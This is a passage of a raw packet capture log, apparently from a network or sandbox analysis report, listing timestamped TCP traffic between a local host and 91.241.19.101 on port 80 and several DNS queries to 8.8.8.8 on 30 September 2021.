                                                                  Sep 30, 2021 23:54:14.434458017 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.475075960 CEST5008080192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.476741076 CEST5008280192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.563793898 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.563848019 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.563884020 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.563919067 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.563954115 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.563954115 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.563987970 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.563990116 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.564024925 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.564059973 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.564060926 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.564095974 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.564125061 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.605159044 CEST805008091.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.605284929 CEST5008080192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.617000103 CEST805008291.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.617135048 CEST5008280192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.624037027 CEST5008280192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.692392111 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.692420006 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.692431927 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.692502022 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.692508936 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.692542076 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.692642927 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.692910910 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.692962885 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.692992926 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.693013906 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.693039894 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.693048000 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.693104982 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.759378910 CEST805008291.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.814327955 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.814645052 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.814692974 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.814733028 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.815165997 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.815545082 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.815866947 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.816035986 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.816086054 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.816107035 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.816462994 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.816534996 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.816606998 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.816658974 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.818289995 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.836405039 CEST805008291.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.836493015 CEST5008280192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.865782022 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:14.865919113 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.943654060 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.944401979 CEST5008280192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:14.949563026 CEST5008380192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.063561916 CEST805008191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.063652992 CEST5008180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.064238071 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.075063944 CEST805008291.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.075172901 CEST5008280192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.080781937 CEST805008391.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.080914021 CEST5008380192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.081414938 CEST5008380192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.188477039 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.188674927 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.190011024 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.190284967 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.190684080 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.191009998 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.216916084 CEST805008391.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.291516066 CEST805008391.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.291861057 CEST5008380192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.315085888 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.315185070 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.315576077 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.315655947 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.315850973 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.315924883 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.315979004 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.316164017 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.397123098 CEST5008380192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.399786949 CEST5008580192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.440152884 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.440207005 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.440242052 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.440288067 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.440350056 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.440404892 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.440473080 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.440476894 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.440532923 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.440572977 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.440609932 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.442673922 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.522550106 CEST805008591.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.522751093 CEST5008580192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.523852110 CEST5008580192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.530529976 CEST805008391.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.530651093 CEST5008380192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.562200069 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.562269926 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.562314987 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.562509060 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.562551022 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.564443111 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.564482927 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.564518929 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.564780951 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.629096031 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.629302979 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.644737005 CEST805008591.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.726133108 CEST805008591.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.726449966 CEST5008580192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.840924025 CEST5008580192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.841622114 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.843497992 CEST5008680192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.846115112 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.962666988 CEST805008591.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.962768078 CEST5008580192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.963134050 CEST805008491.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.963246107 CEST5008480192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.964826107 CEST805008691.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.965763092 CEST5008680192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.967144012 CEST5008680192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.967961073 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:15.968065977 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.971404076 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.971616030 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.972095013 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:15.972860098 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.093832016 CEST805008691.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.098220110 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.098273039 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.098562002 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.098675966 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.098862886 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.098923922 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.098967075 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.098969936 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.099030018 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.099091053 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.099360943 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.099417925 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.099455118 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.099483967 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.144932985 CEST805008691.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.150573969 CEST5008680192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.226054907 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.226246119 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.226706028 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.226747990 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.226794004 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.226813078 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.226831913 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.226880074 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.226923943 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.226954937 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.227025032 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.227042913 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.227104902 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.227188110 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.227305889 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.227387905 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.227488041 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.227521896 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.227617979 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.227628946 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.259747982 CEST5008680192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.262118101 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.352533102 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.352947950 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.352996111 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.353360891 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.353409052 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.353456974 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.353679895 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.353832006 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.353960037 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.354021072 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.354058027 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.354324102 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.354371071 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.354418039 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.386183977 CEST805008691.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.386296988 CEST5008680192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.388633013 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.388842106 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.390053988 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.411686897 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.411807060 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.518315077 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.599977016 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.600171089 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.610910892 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.611107111 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.611299038 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.611433983 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.725033045 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.726421118 CEST5008980192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.735714912 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.735748053 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.735769987 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.735793114 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.735816002 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.735897064 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.735960960 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.736110926 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.736129045 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.736229897 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.736301899 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.736351967 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.850394964 CEST805008791.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.850547075 CEST5008780192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.851671934 CEST805008991.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.851903915 CEST5008980192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.853188038 CEST5008980192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.860939980 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.860960960 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.860970974 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.861104012 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.861104965 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.861198902 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.861290932 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.861409903 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.861596107 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.862158060 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.862188101 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.862282991 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:16.978090048 CEST805008991.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.987432003 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.987462044 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.987482071 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.987500906 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.987520933 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.987540960 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.987559080 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.987577915 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:16.987596989 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.062782049 CEST805008991.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.062915087 CEST5008980192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.095443010 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.095685005 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.178879023 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.179152012 CEST5008980192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.180671930 CEST5009080192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.297851086 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.306202888 CEST805008891.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.306231022 CEST805008991.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.306299925 CEST5008880192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.306350946 CEST5008980192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.307696104 CEST805009091.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.307790995 CEST5009080192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.308490992 CEST5009080192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.437366962 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.437444925 CEST805009091.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.437488079 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.438117981 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.438252926 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.438442945 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.438566923 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.519692898 CEST805009091.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.519790888 CEST5009080192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.576155901 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.576303959 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.576472998 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.576494932 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.576571941 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.576608896 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.576669931 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.576688051 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.576780081 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.576900005 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.713948011 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.714013100 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.714052916 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.714087963 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.714117050 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.714119911 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.714159012 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.714183092 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.714198112 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.714225054 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.714226007 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.714246035 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.714247942 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.714306116 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.714319944 CEST5009180192.168.2.391.241.19.101
                                                                  Sep 30, 2021 23:54:17.851831913 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.851890087 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.852008104 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.852046013 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.852368116 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.852514982 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.852619886 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.852660894 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.852742910 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.852988005 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.853094101 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.853144884 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.924537897 CEST805009191.241.19.101192.168.2.3
                                                                  Sep 30, 2021 23:54:17.924669027 CEST5009180192.168.2.391.241.19.101

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 30, 2021 23:52:07.726257086 CEST5114353192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:52:07.809807062 CEST53511438.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:52:08.849792957 CEST5600953192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:52:08.963298082 CEST53560098.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:52:25.942468882 CEST5902653192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:52:26.027472973 CEST53590268.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:52:33.319205046 CEST4957253192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:52:33.403090000 CEST53495728.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:52:56.592386007 CEST6082353192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:52:56.728801966 CEST53608238.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:52:57.669385910 CEST5213053192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:52:57.827276945 CEST53521308.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:52:58.162626028 CEST5510253192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:52:58.259727955 CEST53551028.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:52:58.650286913 CEST5623653192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:52:58.736752987 CEST53562368.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:52:59.375884056 CEST5652753192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:52:59.508382082 CEST53565278.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:00.358876944 CEST4955953192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:00.433494091 CEST53495598.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:01.354178905 CEST5265053192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:01.429059982 CEST53526508.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:02.541095018 CEST6329753192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:02.617742062 CEST53632978.8.8.8192.168.2.3
                                                                  Sep 30, 2021 23:53:02.716169119 CEST5836153192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:02.717536926 CEST5361553192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:02.751930952 CEST5072853192.168.2.38.8.8.8
                                                                  Sep 30, 2021 23:53:02.801259995 CEST53583618.8.8.8192.168.2.3
